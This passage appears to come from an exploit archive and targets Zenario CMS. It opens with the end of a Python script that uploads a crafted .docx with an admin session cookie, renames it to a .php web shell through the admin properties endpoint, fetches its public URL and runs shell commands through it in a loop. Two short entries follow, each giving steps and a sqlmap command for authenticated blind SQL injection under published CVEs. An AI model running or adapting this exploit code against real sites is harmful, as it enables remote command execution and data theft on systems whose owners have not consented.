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\nCwDBAgAAvSsAAAAA\n"
file_name = uuid.uuid4().hex
file = open(file_name + ".docx", "wb")
file.write(base64.decodebytes(file_content))
file.close()
### Upload docx file
resp = requests.post(TARGET + "/zenario/ajax.php?method_call=handleAdminBoxAJAX&path=zenario_document_upload",
headers={"Cookie":PHPSESSID, "Referer": TARGET + "/zenario/admin/organizer.php?fromCID=1&fromCType=html"},
data={"id":"", "fileUpload": 1, },
files={"Filedata": open(file_name + ".docx", "rb")})
### Get sync id file
resp_body = json.loads(resp.text)
id_sync = resp_body["id"]
# Update database
resp = requests.post(TARGET + "/zenario/admin/admin_boxes.ajax.php?path=zenario_document_upload",
headers={"X-Requested-With": "XMLHttpRequest", "Cookie": PHPSESSID, "Referer": TARGET + "/zenario/admin/organizer.php?fromCID=1&fromCType=html"},
data={"_save": "true", "_confirm": "", "_box": '{"tabs":{"upload_document":{"edit_mode":{"on":1},"fields":{"document__upload":{"current_value":"' + id_sync + '"},"privacy":{"_display_value":false,"current_value":"public"}}}},"_sync":{"cache_dir":"' + cache_dir_sync + '","password":"' + password_sync + '","iv":"' + iv_sync + '","session":false},"tab":"upload_document"}'})
# If upload OK
print("Upload file OK!")
## Change file extension
### Search ID file in Database
resp = requests.get(TARGET + "/zenario/admin/organizer.ajax.php?path=zenario__content/panels/documents&_sort_col=ordinal&_search=" + file_name, headers={"Cookie": PHPSESSID})
resp_body = json.loads(resp.text)
file_id = resp_body["__item_sort_order__"]["0"]
### Get sync info
resp = requests.post(TARGET + "/zenario/admin/admin_boxes.ajax.php?path=zenario_document_properties&id=" + str(file_id),
headers={"Cookie": PHPSESSID, "Referer": TARGET + "/zenario/admin/organizer.php?fromCID=1&fromCType=html"},
data={"_fill": "true", "_values": ""})
resp_body = json.loads(resp.text)
password_sync = resp_body["_sync"]["password"]
iv_sync = resp_body["_sync"]["iv"]
cache_dir_sync = resp_body["_sync"]["cache_dir"]
### Change to .php
resp = requests.post(TARGET + "/zenario/admin/admin_boxes.ajax.php?path=zenario_document_properties&id=" + str(file_id),
headers={"Cookie": PHPSESSID, "Referer": TARGET + "/zenario/admin/organizer.php?fromCID=1&fromCType=html"},
data={"_save": "true", "_confirm": "", "_box": '{"tabs":{"details":{"edit_mode":{"on":1},"fields":{"document_extension":{"_was_hidden_before":true,"current_value":"php"},"document_title":{"current_value":""},"document_name":{"current_value":"' + file_name + '"},"checksum":{"_was_hidden_before":true,"current_value":"y8vuS"},"date_uploaded":{"current_value":"2021-09-2920173A213A31"},"privacy":{"_display_value":"Public","current_value":"public"},"tags":{"_display_value":false,"current_value":""},"link_to_add_tags":{}}},"upload_image":{"edit_mode":{"on":true},"fields":{"thumbnail_grouping":{},"title":{"current_value":""},"thumbnail_image":{},"delete_thumbnail_image":{},"zenario_common_feature__upload":{"current_value":""}}},"extract":{"edit_mode":{"on":0},"fields":{"extract":{"current_value":"No20plain-text20extract"},"extract_wordcount":{"current_value":0}}}},"_sync":{"cache_dir":"' + cache_dir_sync + '","password":"' + password_sync + '","iv":"' + iv_sync + '","session":false},"tab":"details"}'})
## Get public URL webshell
resp = requests.post(TARGET + "/zenario/ajax.php?__pluginClassName__=zenario_common_features&__path__=zenario__content/panels/documents&method_call=handleOrganizerPanelAJAX",
headers={"Cookie": PHPSESSID, "Referer": TARGET + "/zenario/admin/organizer.php?fromCID=1&fromCType=html"},
data={"id": file_id, "generate_public_link": 1})
response_body = resp.text
web_shell_url = response_body[response_body.find("http"): response_body.find(file_name) + 36]
# If web shell OK
print("Web shell is available!")
print("URL:", web_shell_url)
print("Enter command.")
## Execute command
cmd = ''
while cmd != "exit":
### Get command
cmd = input("> ")
### Get result
resp = requests.post(web_shell_url, data={"cmd": cmd})
response_body = resp.text
result = response_body[response_body.find("8d589afa4dfaeeed85fff5aa78e5ff6a") + 32: response_body.find("7f021a1415b86f2d013b2618fb31ae53")]
print(result)
pass
## Delete web shell
resp = requests.post(TARGET + "/zenario/ajax.php?__pluginClassName__=zenario_common_features&__path__=zenario__content/panels/documents&method_call=handleOrganizerPanelAJAX",
headers={"Cookie": PHPSESSID, "Referer": TARGET + "/zenario/admin/organizer.php?fromCID=1&fromCType=html"},
data={"id": file_id, "delete": 1})
print("Web shell is deleted!")
# Delete docx file
os.remove(file_name + ".docx")
print("Docx file is deleted!")
# Exploit Title: Zenario CMS 8.8.53370 - 'id' Blind SQL Injection
# Date: 05/02/2021
# Exploit Author: Balaji Ayyasamy
# Vendor Homepage: https://zenar.io/
# Software Link: https://github.com/TribalSystems/Zenario/releases/tag/8.8
# Version: 8.8.53370
# Tested on: Windows 10 Pro 19041 (x64_86) + XAMPP 7.4.14
# CVE: CVE-2021-26830
# Reference - https://edhunter484.medium.com/blind-sql-injection-on-zenario-cms-b58b6820c32d
Step 1 - Login to the zenario cms with admin credentials.
Step 2 - Go to modules and select plugin library.
Step 3 - Select any plugin and press delete button. Copy the delete request and send it to the sqlmap.
Command - sqlmap -r request.txt -p id
# Exploit Title: Zenario CMS 8.8.52729 - 'cID' Blind & Error based SQL injection (Authenticated)
# Date: 05–02–2021
# Exploit Author: Avinash R
# Vendor Homepage: https://zenar.io/
# Software Link: https://github.com/TribalSystems/Zenario/releases/tag/8.8
# Version: 8.8.52729
# Tested on: Windows 10 Pro (No OS restrictions)
# CVE : CVE-2021–27673
# Reference: https://deadsh0t.medium.com/blind-error-based-authenticated-sql-injection-on-zenario-8-8-52729-cms-d4705534df38
##### Step To Reproduce #####
1) Login to the admin page of Zenario CMS with admin credentials, which is
http://server_ip/zenario/admin.php
2) Click on, New → HTML page to create a new sample page and intercept it
with your interceptor.
3) Just a single quote on the 'cID' parameter will confirm the SQL
injection.
4) After confirming that the 'cID' parameter is vulnerable to SQL
injection, feeding the request to SQLMAP will do the rest of the work for
you.
############ End ############